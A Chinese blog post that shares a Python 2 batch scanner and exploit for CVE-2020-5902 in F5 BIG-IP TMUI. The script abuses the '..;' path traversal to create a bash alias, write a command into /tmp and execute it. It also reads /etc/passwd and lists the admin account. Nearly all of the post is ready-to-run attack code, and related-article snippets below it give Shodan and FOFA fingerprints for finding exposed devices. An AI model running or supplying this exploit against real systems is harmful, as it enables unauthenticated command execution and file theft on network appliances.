F5 BIG-IP TMUI远程代码执行漏洞批量扫描(CVE-2020-5902)

最新推荐文章于 2020-11-18 19:37:32 发布
最新推荐文章于 2020-11-18 19:37:32 发布
阅读量513 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42267685/article/details/107334773
版权

F5 BIG-IP TMUI远程代码执行漏洞扫描(CVE-2020-5902)

F5 BIG-IP TMUI远程代码执行在我当前工作环境中做了次测试,发现还是非常常见的。文件读写就基本属于必中的。
F5 BIG-IP TMUI远程代码执行

CVE-2020-5902手工测试的文章网上有很多我就不复制粘贴了,因F5机器较多,为了偷懒写了个批量检测命令执行,文件读取,RCE的检测脚本,留作分享。

python2

# coding:utf-8
import requests
import json
import requests.packages.urllib3

requests.packages.urllib3.disable_warnings()
import uuid
import sys

# tmshCmd.jsp?command=create+cli+alias+private+list+command+bash
# fileSave.jsp?fileName=/tmp/cmd&content=id
# tmshCmd.jsp?command=list+/tmp/cmd
# tmshCmd.jsp?command=delete+cli+alias+private+list

banner = r'cve-2020-5902'

def tmshCmd_exit(url, file, cmd):
    global command_ip
    command_ip[url] = "Command No Exit"
    tmshCmd_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash"
    proxies = {"http": "http://127.0.0.1:8080", "https": "https://127.0.0.1:8080"}
    r = requests.get(tmshCmd_url, verify=False, allow_redirects=False)
    # r = requests.get(tmshCmd_url,verify=False,allow_redirects=False,proxies=proxies)

    response_str = json.dumps(r.headers.__dict__['_store'])
    # print type(response_str)
    # print response_str
    if r.status_code == 200 and 'tmui' in response_str:
        # print tmshCmd_url
        print "[+] tmshCmd.jsp Exit!"
        print "[+] create cli alias private list command bash \n"
        # cmd = 'whoami'
        upload_exit(url, file, cmd)


    else:
        print "[+] tmshCmd.jsp No Exit!\n"


def upload_exit(url, file, cmd):
    fileSave_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/%s&content=" % file + cmd
    proxies = {"http": "http://127.0.0.1:8080", "https": "https://127.0.0.1:8080"}
    r = requests.get(fileSave_url, verify=False, allow_redirects=False)
    # r = requests.get(fileSave_url,verify=False,allow_redirects=False,proxies=proxies)
    response_str = json.dumps(r.headers.__dict__['_store'])
    if r.status_code == 200 and 'tmui' in response_str:
        # print fileSave_url
        print "[+] fileSave.jsp Exit!\n"
        list_command(url, file)
    else:
        print "[+] fileSave.jsp No Exit!\n"


def list_command(url, file):
    global command_ip
    rce_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/%s" % file
    proxies = {"http": "http://127.0.0.1:8080", "https": "https://127.0.0.1:8080"}
    r = requests.get(rce_url, verify=False, allow_redirects=False)
    # r = requests.get(rce_url,verify=False,allow_redirects=False,proxies=proxies)
    response_str = json.dumps(r.headers.__dict__['_store'])
    # print len(r.content)
    if r.status_code == 200 and 'tmui' in response_str:
        if len(r.content) > 33:
            # print rce_url
            command_ip[url]="Command Exit"
            print "[+] Command Successfull !\n"
            command_result = json.loads(r.content)
            print "_" * 90, '\n\n'
            print command_result['output']
            print "_" * 90, "\n\n"
            delete_list(url)
    else:
        print "[+] Command Failed !\n"
        command_ip[url] = "Command No Exit"

def delete_list(url):
    delete_url = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list'
    proxies = {"http": "http://127.0.0.1:8080", "https": "https://127.0.0.1:8080"}
    r = requests.get(delete_url, verify=False, allow_redirects=False)
    # r = requests.get(delete_url,verify=False,allow_redirects=False,proxies=proxies)
    response_str = json.dumps(r.headers.__dict__['_store'])
    if r.status_code == 200 and 'tmui' in response_str:
        # print delete_url
        print "[+] delete cli alias private list Successfull! \n"
    else:
        print "[+] delete cli alias private list Failed! \n"

def file_read(url):
    global dict_ip
    delete_url = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
    proxies = {"http": "http://127.0.0.1:8080", "https": "https://127.0.0.1:8080"}
    r = requests.get(delete_url, verify=False, allow_redirects=False)
    # r = requests.get(delete_url,verify=False,allow_redirects=False,proxies=proxies)
    response_str = r.text
    if r.status_code == 200 and 'root' in response_str:
        # print delete_url
        dict_ip[url]="FILE READ Exist"
        print "[+] File READ Successfull! "
        print response_str
    else:
        print "[+] File READ Failed! "
        dict_ip[url] = "FILE READ NO Exist"


def RCE_read(url):
    delete_url = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
    proxies = {"http": "http://127.0.0.1:8080", "https": "https://127.0.0.1:8080"}
    r = requests.get(delete_url, verify=False, allow_redirects=False)
    # r = requests.get(delete_url,verify=False,allow_redirects=False,proxies=proxies)
    response_str = r.text
    global Rce_ip
    if r.status_code == 200 and 'output' in response_str:
        # print delete_url
        Rce_ip[url]="RCE exist"
        print "[+] rce Successfull! "
        print response_str
    else:
        print "[+] rce Failed! "
        Rce_ip[url] = "RCE No exist"


if __name__ == '__main__':
    print banner
    ip=["10.200.163.27","10.200.163.28"] #此处加入需要批量检测IP进行扫描
    #url = "https://x.x.x.x"
    #url = sys.argv[1]
    url="https://10.200.158.20"
    dict_ip={}
    command_ip={}
    Rce_ip={}
    for i in ip:
        try:
            url="https://"+i
            print(url)
            file = str(uuid.uuid1())
            print "/tmp/" + file, "\n"
            # cmd = raw_input("[+]Set Cmd= ")
            cmd = "whoami"
            print
            tmshCmd_exit(url, file, cmd)
            #upload_exit(url, file, cmd)
            list_command(url, file)
            delete_list(url)
            file_read(url)
            RCE_read(url)
        except:
            print url
            dict_ip[url]="No connect"
            command_ip[url]="No connect"
            Rce_ip[url] = "No connect"
    for  i in command_ip:
        print(i,command_ip[i],dict_ip[i],Rce_ip[i])

所以说懒是人类进步的阶梯-。-

流苏-
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
c++ 界面交互影响处理代码执行速度_【更新】F5 BIGIP TMUI远程代码执行漏洞公告...
weixin_42214654的博客
12-01 211
F5 BIG-IP是一系列应用交付平台,具有负载均衡,流量管理,应用程序管理等多种功能。F5 BIG-IP的流量管理用户界面(TMUI)被发现存在远程代码执行漏洞。此漏洞允许未经验证的攻击者通过BIG-IP管理端口对TMUI进行访问并执行任意系统命令。漏洞信息于2020年7月1号由F5发布,截至2020年7月8日官方已对所有版本发布安全更新版本。2020年7月5日,互联网中出现该漏洞的利...
CVE-2020-5902F5 BIG-IP TMUI远程代码执行漏洞复现
Jietewang的博客
11-23 1271
BIG-IPF5公司制造的一款多功能网络设备,设备经配置后可作为流量控制系统、负载平衡器、防火墙、访问网关、速率限制器或SSL中间件。基础信息FOFA指纹:title=”BIG-IP®-Redirect”下载地址:https://downloads.f5.com/esd/eula.sv?
f5 V11 TMSH命令行操作手册
weixin_34302561的博客
11-06 1607
1.命令行登录工具:“SshClient.exe” 2.查看当前系统配置:   # show running-config   # show running-config net interface:网络接口配置   # show running-config ltm pool:pool配置 3.保存base内容:#save /sys base-config 4.load base内...
F5 BIG-IP TMUI 远程代码执行(CVE-2020-5902)
mei_13的博客
07-08 597
1.1 漏洞描述: 在F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。2020年7月1日,F5官方公布流量管理用户界面(TMUI)存在 前台远程执行代码(RCE)漏洞CVE-2020-5902)。攻击者利用该漏洞,构造恶意请求,在未授权的情况下通过向漏洞页面发送特制的请求包,可以造成任意 Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。 1.2 影响范围
分享F5 BIG-IP TMUI 远程代码执行漏洞CVE-2020-5902
weixin_49440873的博客
07-17 741
第一步目标明确` |shodan http.favicon.hash:-335242539 http.title:"BIG-IP®- Redirect" fofa title="BIG-IP®- Redirect" censys 443.https.get.body_sha256:5d78eb6fa93b995f9a39f90b6fb32f016e80dbcda8eb71a17994678692585ee5 443.https.get.title:"BIG-IP&am
CVE-2020-5902 F5 BIG-IP TMUI 远程代码执行漏洞.md
04-23
CVE-2020-5902 F5 BIG-IP TMUI 远程代码执行漏洞
CVE-2020-5902的概念证明-Linux开发
05-27
BIG-IP版本15.0.0-15.1.0.3、14.1.0-14.1.2.5、13.1.0-13.1.3.3、12.1.0-12.1.5.1和11.6.1-11.6.5.1中,流量管理用户接口(TMUI),也称为配置实用程序,在未公开的页面中具有远程执行代码(RCE)漏洞。...
基于UNIAPP的VUE3 TypeScript跨端组件库tmui.design设计源码
最新发布
04-16
本源码项目是基于UNIAPP的VUE3 TypeScript跨端组件库tmui.design...通过该项目,开发者可以轻松实现多平台间的代码复用和组件共享,提高开发效率和应用质量。系统界面友好,易于操作,适合用于各类跨端应用开发场景。
tm.ui.ListView:用于tmlib.js的ListView
05-16
tm.ui.ListView 用于tmlib.js的ListView 用法 基本的 var model = [ "black" , "white" , "luminous" , "bloom" , "eaglet" , ] ; var listView = ListView ( { width : 640 , ...listView .... { name : "s
MUI打包成APP详解.doc
11-08
执行命令时,你需要设定并记住一个口令,这个口令会在签名应用时使用。 ### 2. 利用HBuilder打包 HBuilder是一款强大的HTML5开发工具,支持MUI框架,并提供了便捷的打包服务。首先,你需要注册HBuilder账号,...
weblogicCVE-2018-2628批量检测工具
05-08
weblogic-CVE-2018-2628-反序列化漏洞批量验证脚本。优化多线程检测。具备漏洞发现功能。
F5 BIG-IP TMUI 远程代码执行漏洞CVE-2020-5902
box
07-24 741
一、漏洞详情 近日,绿盟科技监测到F5官方对流量管理用户界面(TMUI远程代码执行漏洞CVE-2020-5902)的安全公告进行了更新。受影响的15.x版本变更为15.0.0-15.1.0,更新了可被绕过的临时缓解措施及验证方法;未经身份验证的攻击者通过BIG-IP管理端口或自身IP访问TMUI,可构造恶意请求获取目标服务器权限,CVSS评分为10分。目前msf已经集成了该漏洞的利用,建议还未修复的用户尽快采取措施进行防护。 F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全
F5 BIG-IP远程代码执行漏洞CVE-2020-5902
chaojixiaojingang
08-21 1798
1.影响范围 F5 BIGIP 15.1.0 F5 BIGIP 15.0.0 F5 BIGIP 14.1.0‐14.1.2 F5 BIGIP 13.1.0‐13.1.3 F5 BIGIP 12.1.0‐12.1.5 F5 BIGIP 11.6.1‐11.6.5 2.漏洞描述 攻击者可利用该漏洞执行任意系统命令、创建或删除文件、禁用服务、执行任意的Java代码,可获取shell完全控制目标系统。 存在漏洞目标网站页面: 3.网络资产查找 (1)shodan ...
mui 登录页/注册页/列表页/详情页
AIZIYOU1111的博客
07-03 9094
点击打开链接
8、mui 登录页/注册页/列表页/详情页
热门推荐
sue的博客
08-24 2万+
一参考资料 二登录页 效果图 代码 三注册页 页面效果 代码 四列表页 代码 五详情页 代码一、参考资料 http://edu.yuantuan.com/course/98/learn#lesson/828 二、登录页1. 效果图2. 代码<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta name="viewpo
F5 BIG-IP TMUI远程代码执行漏洞复现(CVE-2020-5902)
谢公子的博客
07-07 1989
F5 BIG-IP F5 BIG-IP Edge Gateway是一个接入解决方案,为远程用户提供了SSL VPN远程接入、安全性、应用加速和高可用性服务。 CVE-2020-5902 漏洞描述 2020年7月3日,未授权的远程攻击者通过向漏洞页面发送特制的请求包,可以造成任意Java代码执行。进而控制F5 BIG-IP的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等,该漏洞影响控制面板受影响,不影响数据面板。 漏洞危害等级 严重 影响版本 BIG-IP
漏洞通告】F5 BIG-IP TMUI 远程代码执行漏洞CVE-2020-5902)通告
爱国小白帽
07-06 1345
漏洞通告】F5 BIG-IP TMUI 远程代码执行漏洞CVE-2020-5902)通告 原创 威胁对抗能力部 [绿盟科技安全情报](javascript:void(0)???? 今天 通告编号:NS-2020-0040 2020-07-06 TA****G: F5、TMUICVE-2020-5902、EXP披露 漏洞危害: 高,攻击者利用此漏洞,可实现远程代码执行。 应急等级: 黄色 版本: 1.0 1 漏洞概述 近日,F5官方发布公告修复了一个存在于流量管理用户界面(T
F5 BIG-IP远程代码执行漏洞(CVE-2020-5902)复现
m0_48520508的博客
11-18 1247
0x00简介 F5 BIG-IP 是美国``F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。 在F5 BIG-IP产品的流量管理用户页面 (TMUI)/配置程序的特定页面中存在一处远程代码执行漏洞,导致可以未授权访问TMUI模块所有功能(包括未公开功能),漏洞影响范围包括执行任意系统命令、任意文件读取、任意文件写入、开启/禁用服务等。 0x02漏洞概述 攻击者可利用该漏洞执行任意系统命令、创建或删除文件、禁用服务、执行任意的Java代码,可获取sh
F5漏洞问题解决方案
净慧的博客
02-06 2497
1、检测到目标URL存在http host头攻击漏洞 整改说明:在F5 web服务器中配置host请求IP白名单,不在白名单内则禁止访问。 如图: 2、点击劫持:X-Frame-Options未配置 整改说明:在F5 web服务器上新增请求响应配置。 如图: 3、检测到目标URL启用了不安全的HTTP方法 整改说明:在F5 服务器中新增配置,只允许配置的请求方法。 如图:(注意:根据具体情况配...
tmui fetch统一配置
06-09
对于 TMUI Fetch 的统一配置,您可以在 BIG-IP 系统的 CLI(命令行界面)中使用以下命令: 1. 创建一个名为 `fetch_global` 的全局变量: ``` tmsh create sys global-settings variables add { fetch_global { } ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值